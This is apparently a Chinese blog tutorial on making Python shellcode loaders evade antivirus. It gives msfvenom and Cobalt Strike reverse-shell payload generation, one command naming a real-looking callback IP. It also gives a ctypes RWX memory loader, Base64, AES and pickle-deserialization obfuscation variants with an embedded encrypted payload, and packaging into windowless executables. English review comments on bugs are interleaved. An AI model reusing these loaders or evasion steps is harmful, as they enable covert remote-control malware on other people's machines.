
Python-shellcode免杀分离

大飞先生 2024-07-17 12:01:02
简介Python-shellcode免杀分离

#Python-原生态-MSF&CS&生成&执行代码

MSF-payload:msfvenom -p windows/meterpreter/reverse_tcp lhost=X.X.X.X lport=6688 -f c

CS-payload:

攻击--生成后门--payload生成器--选择监听器和输出格式为C语言

Python 3.10(32 位)。注意:解释器位数必须与 payload 架构一致——本文生成的 payload 均为 32 位,32 位 shellcode 在 64 位进程中不会按预期执行,因此必须切换为 32 位 Python 解释器。

import ctypes
# Paste the C-format payload bytes (msfvenom -f c / CS "C" output) here; the page leaves it empty.
# With an empty payload VirtualAlloc is asked for 0 bytes and fails -- nothing below checks for that.
shellcode=b""
# VirtualAlloc(NULL, size, MEM_COMMIT=0x1000, PAGE_EXECUTE_READWRITE=0x40): one region that is
# writable *and* executable. The return value (NULL on failure) is never checked.
# NOTE(review): ctypes defaults every return type to c_int, so on a 64-bit interpreter the returned
# address may be truncated -- one concrete reason this page insists on a 32-bit Python.
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
# Copy exactly len(shellcode) bytes in (create_string_buffer appends a NUL that is not copied).
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
# Start a thread whose entry point is the RWX buffer. An RWX allocation followed by a thread
# started at that address is a well-known pattern that endpoint security products commonly monitor.
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
# -1 == INFINITE: block until the payload thread exits so the host process stays alive.
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

将shellcode填入,run即可上线,payload均为32位

#Python-混淆加密-Base64&AES&反序列化等

Python 3.10(32 位)。同上:payload 为 32 位,解释器也必须是 32 位,否则 shellcode 不会按预期执行。

BASE64 编码(注意:Base64 只是编码而非加密——没有密钥,任何人都能直接解码;它只能改变载荷的静态字节特征,不提供任何保密性)

import base64
# NOTE(review): this listing never imports ctypes, so the VirtualAlloc line below raises NameError
# exactly as printed; the first listing on the page has the missing `import ctypes`.
shellcode=b""
# The encode is undone immediately, so the bytes in memory (and in the packed file) are identical
# to the raw variant above. The later listings embed only the *encoded* form, which is the point.
shellcode=base64.b64encode(shellcode)
shellcode=base64.b64decode(shellcode)
# MEM_COMMIT (0x1000) + PAGE_EXECUTE_READWRITE (0x40); return value (NULL on failure) unchecked.
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
# Copy len(shellcode) bytes into the RWX region.
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
# Thread entry point is the buffer itself.
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
# -1 == INFINITE.
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

AES+Base64免杀(说明:密钥和 IV 都硬编码在发布版脚本中,AES 在这里只起到混淆静态特征的作用,对拿到程序的人不具备任何保密性)

加密脚本在本机运行并输出 hex 密文;发布版(即打包成 exe 的脚本)内置同样的密钥和 IV,运行时先解密再执行。

采用base64加密的MSFpayload:

msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=43.143.231.203 lport=6699 -f c

1、加密代码

from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
import ctypes,base64

# 如果text不足16位的倍数就用空格补足为16位
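def add_to_16(text: str) -> bytes:
    """Right-pad *text* with spaces so its UTF-8 encoding is a multiple of 16 bytes.

    AES-CBC (as used by encrypt()) only accepts whole 16-byte blocks. The padding
    character is a space, which decrypt() strips again; that round-trips only because
    the payload text (Base64) never ends in a space.

    Args:
        text: plaintext to pad (here the Base64-encoded payload text).

    Returns:
        UTF-8 bytes of the padded text; the length is a multiple of 16.

    Fix: the original appended ('' * add) -- an empty string -- so no padding was ever
    applied and any input that was not already a 16-byte multiple made AES.encrypt
    raise. The comment promised spaces; this now pads with spaces.
    """
    encoded = text.encode('utf-8')
    # Shortfall to the next multiple of 16; 0 when already aligned.
    shortfall = (-len(encoded)) % 16
    # A space is a single UTF-8 byte, so padding after encoding equals padding before.
    return encoded + b' ' * shortfall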

# 加密函数
def encrypt(text: str) -> bytes:
    """Encrypt *text* with AES-128-CBC and return the ciphertext hex-encoded (bytes).

    NOTE(review): the key and IV are hard-coded literals, and the same values are
    compiled into the "release" decrypt() below, so this provides no confidentiality
    -- anyone holding the binary recovers both. Its only effect is to change the
    static bytes of the embedded payload. Because the IV is fixed, identical inputs
    also produce identical ciphertext.
    """
    key = '9999999999999999'.encode('utf-8')  # 16-byte key -> AES-128, hard-coded
    mode = AES.MODE_CBC
    iv = b'qqqqqqqqqqqqqqqq'  # fixed 16-byte IV, also hard-coded
    # Input length must be a multiple of 16 (pycryptodome rejects other lengths).
    text = add_to_16(text)
    cryptos = AES.new(key, mode, iv)
    cipher_text = cryptos.encrypt(text)
    # Hex-encode so the ciphertext can be pasted as a literal into the release script
    # (raw ciphertext bytes are not guaranteed to be printable).
    return b2a_hex(cipher_text)
if __name__ == '__main__':

    # s: the Base64 payload text (msfvenom --encrypt base64 output); a placeholder on this page.
    s='''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'''
    e = encrypt(s)
    # Prints the hex ciphertext that the release script embeds as `e`.
    print(e)

2.打包生成exe

from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
import ctypes,base64

# 如果text不足16位的倍数就用空格补足为16位
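def add_to_16(text: str) -> bytes:
    """Right-pad *text* with spaces so its UTF-8 encoding is a multiple of 16 bytes.

    Mirror of the encrypt-side helper: AES-CBC needs whole 16-byte blocks, the pad
    character is a space and decrypt() strips trailing spaces again (safe only
    because Base64 text never ends in a space).

    Args:
        text: plaintext to pad.

    Returns:
        UTF-8 bytes of the padded text; the length is a multiple of 16.

    Fix: the original appended ('' * add), i.e. nothing, so inputs that were not
    already 16-byte aligned were passed through unpadded and AES rejected them.
    """
    encoded = text.encode('utf-8')
    shortfall = (-len(encoded)) % 16   # 0 when already aligned
    return encoded + b' ' * shortfall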

# 解密后,去掉补足的空格用strip() 去掉
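def decrypt(text: bytes | str) -> str:
    """Reverse encrypt(): hex-decode *text*, AES-128-CBC decrypt it with the same
    hard-coded key/IV, and return the plaintext with the space padding removed.

    Args:
        text: hex-encoded ciphertext as produced by encrypt().

    Returns:
        The plaintext as a str (here the Base64 payload text), trailing spaces stripped.

    Raises:
        ValueError: odd-length / non-hex input, or decrypted bytes that are not valid
            UTF-8 (which is what a wrong key or IV looks like).

    NOTE(review): key and IV are the very literals used by encrypt() and they ship
    inside the released binary, so this is obfuscation, not encryption -- the payload
    is recoverable by anyone who has the executable.

    Fix: the original called rstrip('') -- an empty chars argument strips nothing --
    while the padding helper is documented as padding with spaces; strip spaces.
    """
    key = '9999999999999999'.encode('utf-8')  # same 16-byte key as encrypt()
    iv = b'qqqqqqqqqqqqqqqq'  # same fixed IV as encrypt()
    mode = AES.MODE_CBC
    cryptos = AES.new(key, mode, iv)
    plain_text = cryptos.decrypt(a2b_hex(text))
    # Strict UTF-8 decode, then drop the space padding added by add_to_16().
    shellcode = plain_text.decode('utf-8').rstrip(' ')
    return shellcode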

def zhixing(shellcode: bytes) -> None:
    """Copy *shellcode* into a fresh RWX region and run it on a new thread, blocking
    until that thread exits.

    Windows-only (ctypes.windll); the same loader as the top of the page.
    Nothing here checks return values: VirtualAlloc returns NULL on failure (e.g. an
    empty payload) and CreateThread returns NULL on failure, and both are used anyway.
    NOTE(review): ctypes defaults return types to c_int, so on a 64-bit interpreter the
    address from VirtualAlloc may be truncated -- one reason the page requires 32-bit Python.
    """
    # MEM_COMMIT (0x1000) + PAGE_EXECUTE_READWRITE (0x40): writable *and* executable memory.
    rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
    # create_string_buffer copies the bytes (plus a NUL); only len(shellcode) bytes are moved.
    ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
    # Thread entry point is the buffer. RWX memory plus a thread started at that address is a
    # well-known pattern that endpoint security products commonly monitor.
    handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
    # -1 == INFINITE: keep the process alive for as long as the payload thread runs.
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

if __name__ == '__main__':
    # Hex ciphertext emitted by the encrypt-side script. The key/IV are the same literals as in
    # decrypt(), so this blob is fully recoverable by anyone holding the packed executable.
    e=b'33f749a8505ca4735580904332883c2af54f80ec86d18ef7a394c40e880ded215a754d1ace5e7a830d3e3e47e9d6823872c11c0e504fd4d4b8b327090bbf2401b4df090d6818cad9b0df97f0ab48105f3db9167049bba97ef05cda4167a0fdf88e20d92dce5251c4dcdd9f87f111d17e9864f9a3fefb8abfb1dc7bfadb61600200b1852e8509e50305a36f05ce0eae405a4e193104efa9b4fb91561b912aecf1e036c3b646b4a9ed39a5e1fe599b3b47f6a27502b63ab256053ba47a25b8d8ad8faab09279da78e0dc85a45706db2c359d04fc4256da36a81150eb2fd46d134a0b9efa5987b8eaa5abbff4c7baa44141a416d4506ca6e6d3cdf63e82c0bfcfd28c84d1fa5dddc61b6d3f1b34e20bd30e0875fa1d9f6a522e88de1aa2b3b6e9b39f32c962bf47276fe448b5ddd9c8229f5660860eb6a0a3a48e5d3d28a17851f29146209cfe84c6fcbe08cc5a10e5cfc1d36419acad929c217ff8c82546a250d1a0db63b0a87d49c141bdace0299b05f729968011ae862a30bd05f483e9dcdd789b459957a7f80a472bc2474d2f5bd40a43a0e8c24c89db291e7d2644d3f05f54c0fbaab541e49b1338ba810afa0b691b457cce89b568c26f9b9369584ab004539ba52c0423aac6db0a2823f79ff03435f57052734d66268239564c4aafaf2df5'
    d = decrypt(e)  # AES layer off -> Base64 payload text
    # The msfvenom payload was generated with --encrypt base64, so one more decode layer.
    d=base64.b64decode(d)
    zhixing(d)

shellcode反序列化

1、加密版本

import pickle
import base64

# Python *source* that the release script will exec() when it unpickles the gadget below.
# It is the same RWX loader as at the top of the page, with the payload embedded as a
# Base64 literal (placeholder on this page) and decoded at run time.
shellcode = '''
import ctypes,base64
encode_shellcode=b'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'
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)'''
# Build the pickle for an A() instance and Base64 it (the original used C-style `//`
# here, which is a syntax error in Python).
# A.__reduce__ makes unpickling call exec(shellcode).
class A(object):
    """Pickle gadget: unpickling an instance calls exec(shellcode) instead of rebuilding an object.

    pickle serializes the (callable, args) tuple returned by __reduce__ and, on load,
    invokes that callable unconditionally. The resulting pickle therefore holds a
    reference to builtins.exec plus the source string -- class A itself is not needed
    on the loading side. This is exactly why pickle.loads on untrusted data is
    arbitrary code execution.
    """
    def __reduce__(self):
        return (exec, (shellcode,))


# Serialize the gadget. The pickle carries builtins.exec and the source string (see
# A.__reduce__); the exec itself only happens on the *loading* side.
ret = pickle.dumps(A())
# Base64 so the bytes can be pasted as a literal into the release script.
ret_base64 = base64.b64encode(ret)
print(ret_base64)

2.发布版本

# Release side. `ctypes` is not used by this file directly -- the exec'd source above
# re-imports ctypes itself.
import base64,pickle,ctypes
# Base64 of the pickle produced by the script above (placeholder on this page).
shellcode=b'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'
# pickle.loads reconstructs the object by calling exec(source): arbitrary code execution by
# design of the format. Never call pickle.loads on data you do not fully control.
pickle.loads(base64.b64decode(shellcode))

pickle.loads 反序列化时会按对象 `__reduce__` 返回的 (callable, args) 重建对象,即无条件调用该 callable——这里就是 exec(shellcode)。这也正是 pickle.loads 绝不能用于不可信数据的原因:反序列化本身就等于任意代码执行。

#Python-打包器选择-Pyinstall&Py2exe&Nuitka

1、pyinstaller

-F, --onefile 打包为单个可执行文件,如果你的代码都写在一个.py文件的话,可以用这个,如果是多个.py文件就别用

-D, --onedir 打包为一个目录,在dist中生成很多依赖文件,适合以框架形式编写工具代码,我个人比较推荐这样,代码易于维护

-K, --tk 在部署时包含 TCL/TK

-a, --ascii 不包含编码.在支持Unicode的python版本上默认包含所有的编码.

-d, --debug 产生debug版本的可执行文件

-w, --windowed, --noconsole 使用Windows子系统执行.当程序启动的时候不会打开命令行(只对Windows有效)

-c, --nowindowed, --console 使用控制台子系统执行(默认)(只对Windows有效)

使用:pyinstaller -F test.py --noconsole

2、py2exe

安装:pip install py2exe

打包:python setup.py py2exe

3、Nuitka(安装后 nuitka 命令位于 C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Scripts)

安装:pip install Nuitka

使用:nuitka --mingw64 --standalone --show-memory --show-progress --nofollow-imports --follow-import-to=utils,src --output-dir=out 108.py
